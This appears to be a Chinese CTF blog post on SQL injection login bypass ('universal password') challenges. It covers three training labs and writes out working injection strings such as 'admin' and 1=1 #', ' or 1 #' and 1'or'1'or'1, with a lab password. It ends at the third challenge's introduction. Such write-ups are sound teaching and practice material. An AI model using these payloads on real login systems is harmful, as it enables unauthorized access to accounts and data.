SQL注入是CTF的WEB方向必不可少的一种题型,斗哥最近也做了一些在线题目,其中最常见的题目就是给出一个登录界面,让我们绕过限制登录或者一步步注入数据。
万能密码—very easy
题目入口:http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php
题目来源:hacking lab inject 01~
源代码有提示:
万能密码登录语句构造:select * from admin where username='admin'and 1=1 #' and password='123456' ORselect * from admin where username='admin'or 1 #' and password='123456'
或者不需要admin。select * from admin where username='1'or 1 or 1 #' and password='123456'
还可以用#来注释。select * from admin where username='admin'#' and password='123456'
万能密码— easy
题目入口:http://redtiger.labs.overthewire.org/level2.php
题目来源:RedTigers Hackit Level 2 Simple login-bypass
做题密码:4_is_not_random构造语句: username=1&password=1'or'1'or'1&login=Login
万能密码— not than easy
题目入口: http://ctf5.shiyanbar.com/web/wonderkun/web/index.html
题目来源:实验吧,不要怀疑,我已经过滤了一切,还再逼你注入,哈哈哈哈哈!